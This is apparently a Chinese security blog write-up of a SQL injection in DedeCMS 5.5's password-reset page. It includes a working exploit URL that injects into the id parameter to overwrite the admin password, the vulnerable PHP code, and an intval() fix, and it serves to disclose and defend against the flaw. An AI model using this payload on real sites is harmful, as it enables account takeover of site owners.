dedecms /member/resetpassword.php SQL Injection Vul

时间:2021-01-13 00:08:38

catalog

. 漏洞描述
. 漏洞触发条件
. 漏洞影响范围
. 漏洞代码分析
. 防御方法
. 攻防思考

1. 漏洞描述

DEDEcms SQL注入漏洞导致可以修改任意用户密码

2. 漏洞触发条件

. 注册一个用户
. 找回密码,选择通过安全问题取回: http://localhost/dedecms5.5/member/resetpassword.php
. 填写完毕信息之后点击确认
. 然后点击确认,会跳转到这样一个URL上: http://localhost/dedecms5.5/member/resetpassword.php?dopost=getpasswd&id=2&key=zPnruOY7
//黑客就可以构造EXP如下
http://127.0.0.1/dedecms5.5/member/resetpassword.php?dopost=getpasswd&id=xx' or userid='admin' and '2&key=zPnruOY7&setp=2&pwd=111222&pwdok=111222
//把上面url中的2改成之前跳转到链接的id参数,然后把key也改成之前跳转的链接的key参数
//然后userid可以修改成你需要修改密码的用户: admin
//pwd和pwdok就是需要修改成的密码必须保持一样: md5(111222)=00b7691d86d96aebd21dd9e138f90840

aaarticlea/png;base64,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" alt="" />

修改成功

Relevant Link:

http://www.wooyun.org/bugs/wooyun-2010-042167

3. 漏洞影响范围
4. 漏洞代码分析

/member/resetpassword.php

..
elseif($dopost == "getpasswd")
{
//修改密码
if(empty($id))
{
ShowMsg("对不起,请不要非法提交","login.php");
exit();
}
//只匹配出了所有的数字
$mid = ereg_replace("[^0-9]","",$id);
$row = $db->GetOne("Select * From #@__pwd_tmp where mid = '$mid'");
if(empty($row))
{
ShowMsg("对不起,请不要非法提交","login.php");
exit();
}
if(empty($setp))
{
$tptim= (***);
$dtime = time();
if($dtime - $tptim > $row['mailtime'])
{
$db->executenonequery("DELETE FROM `#@__pwd_tmp` WHERE `md` = '$id';");
ShowMsg("对不起,临时密码修改期限已过期","login.php");
exit();
}
require_once(dirname(__FILE__)."/templets/resetpassword2.htm");
}
//攻击poc进入这个流支
elseif($setp == )
{
if(isset($key))
{
$pwdtmp = $key;
}
$sn = md5(trim($pwdtmp));
if($row['pwd'] == $sn)
{
if($pwd != "")
{
if($pwd == $pwdok)
{
$pwdok = md5($pwdok);
$sql = "DELETE FROM `#@__pwd_tmp` WHERE `mid` = '$id';";
$db->executenonequery($sql);
//$id没有经过任何过滤就带入了SQL查询,导致了update注入
$sql = "UPDATE `#@__member` SET `pwd` = '$pwdok' WHERE `mid` = '$id';";
if($db->executenonequery($sql))
..

5. 防御方法

/member/resetpassword.php

/* 对$id变量进行规范化 */
$id = isset($id)? intval($id) : ;
/* */

6. 攻防思考

Copyright (c) 2015 LittleHann All rights reserved

dedecms /member/resetpassword.php SQL Injection Vul的更多相关文章

  1. dedecms /member/flink_main.php SQL Injection Vul

    catalog . 漏洞描述 . 漏洞触发条件 . 漏洞影响范围 . 漏洞代码分析 . 防御方法 . 攻防思考 1. 漏洞描述 会员模块中存在的SQL注入 Relevant Link http://w ...

  2. dedecms /member/uploads_edit.php SQL Injection Vul

    catalog . 漏洞描述 . 漏洞触发条件 . 漏洞影响范围 . 漏洞代码分析 . 防御方法 . 攻防思考 1. 漏洞描述 Dedecms 5.3版本下的member/uploads_edit.p ...

  3. dedecms /member/reg_new.php SQL Injection Vul

    catalog . 漏洞描述 . 漏洞触发条件 . 漏洞影响范围 . 漏洞代码分析 . 防御方法 . 攻防思考 1. 漏洞描述 Dedecms会员中心注入漏洞 2. 漏洞触发条件 http://127 ...

  4. dedecms /member/pm.php SQL Injection Vul

    catalog . 漏洞描述 . 漏洞触发条件 . 漏洞影响范围 . 漏洞代码分析 . 防御方法 . 攻防思考 1. 漏洞描述 Dedecms会员中心注入漏洞 Relevant Link http:/ ...

  5. dedecms /member/myfriend_group.php SQL Injection Vul

    catalog . 漏洞描述 . 漏洞触发条件 . 漏洞影响范围 . 漏洞代码分析 . 防御方法 . 攻防思考 1. 漏洞描述 Dedecms会员中心注入漏洞 Relevant Link http:/ ...

  6. dedecms /member/mtypes.php SQL Injection Vul

    catalog . 漏洞描述 . 漏洞触发条件 . 漏洞影响范围 . 漏洞代码分析 . 防御方法 . 攻防思考 1. 漏洞描述 Dedecms会员中心注入漏洞 Relevant Link http:/ ...

  7. dedecms /member/edit_baseinfo.php SQL Injection Vul

    catalog . 漏洞描述 . 漏洞触发条件 . 漏洞影响范围 . 漏洞代码分析 . 防御方法 . 攻防思考 1. 漏洞描述 会员模块中存在的SQL注入 Relevant Link: http:// ...

  8. dedecms \plus\guestbook.php SQL Injection Vul By \plus\guestbook\edit.inc.php

    catalog . 漏洞描述 . 漏洞触发条件 . 漏洞影响范围 . 漏洞代码分析 . 防御方法 . 攻防思考 1. 漏洞描述 注射漏洞成功需要条件如下 . php magic_quotes_gpc= ...

  9. dedecms /plus/feedback.php SQL Injection Vul

    catalog . 漏洞描述 . 漏洞触发条件 . 漏洞影响范围 . 漏洞代码分析 . 防御方法 . 攻防思考 1. 漏洞描述 . Dedecms v5.7的plus\feedback.php SQL ...

随机推荐

  1. Spring in Action 学习笔记二-DI

    装配bean 2015年10月9日 9:49             Sprng中,对象无需自己负责查找或创建其关联的其他对象.相关,容器负责吧需要相互协作的对象引用赋予各个对象. 创建应用对象之间协 ...

  2. 说说js作用域

    开始就来说说作用域这个蛋疼的东西.里面可能会出现各种的问题 .先给一个简单的例子大家猜猜结果是什么 var   a="b"; function text(){ alert(a);v ...

  3. 人体时钟hone hone clock

    摘要:一个由日本人设计的有意思的Flash时钟:人体时钟 hone hone clock .安装很简单,直接js导入即可,包括两种样式:透明背景和白色背景. 很可爱的一个设计,实现后效果如下: 使用方 ...

  4. Unity3D之Mecanim动画系统学习笔记(九):Blend Tree(混合树)

    认识Blend Tree 我们在Animator Controller中除了可以创建一个State外还可以创建一个Blend Tree,如下: 那么我们看下新创建的Blend Tree和State有什 ...

  5. CentOS(Linux) - SVN使用笔记(二) - 创建SVN仓库及下载仓库到本地

    1.安装: 参考文章 CentOS(Linux) - SVN使用笔记(一) -  安装SVN过程及开启和关闭svn服务指令 2.创建仓库 #创建项目目录 mkdir /usr/svn#进入目录cd / ...

  6. Swift - 各种手势检测大全(UIGestureRecognizer及其子类)

    UIGestureRecognizer有许多子类,用于监听一些常见的手势事件,这些子类主要有: 1,UISwipeGestureRecognizer:滑动(快速移动) 1 2 3 4 5 6 7 8 ...

  7. 9.2.1、Libgdx的输入处理之轮询

    (官网:www.libgdx.cn) 轮询是检测输入设备的当前状态,比如特定的按键按下,屏幕第一个手指的位置等等.这是一个快速简单的处理用户输入的方式,并且应用到很多的游戏中. 注意:如果你处理轮询, ...

  8. 如何查看chrome浏览器已保存的密码

    该方法是针对在chrome中已经存储了登陆密码的情况. chrome版本是 66.0.3359.139(正式版本) (64 位),不知道哪天会改了这个bug. 一般来说,我们登陆chrome浏览器已经 ...

  9. Nginx 完整安装篇

    第一步安装各种编译库如c++编译库等 yum install -y gcc //安装GCC ...安装过程省略 yum install -y gcc-c++ //安装C++库用来编译c++ ...安装 ...

  10. Linuc学习3-输入和输出重定向

    已打开的文件描述符在fork和exec调用后保留下来,我们可以利用对进程这方面知识点的理解来改变程序的行为. 这个例子涉及一个过滤程序:它从标准输入读取数据,然后向标准输出写数据,同时在输入和输出之间 ...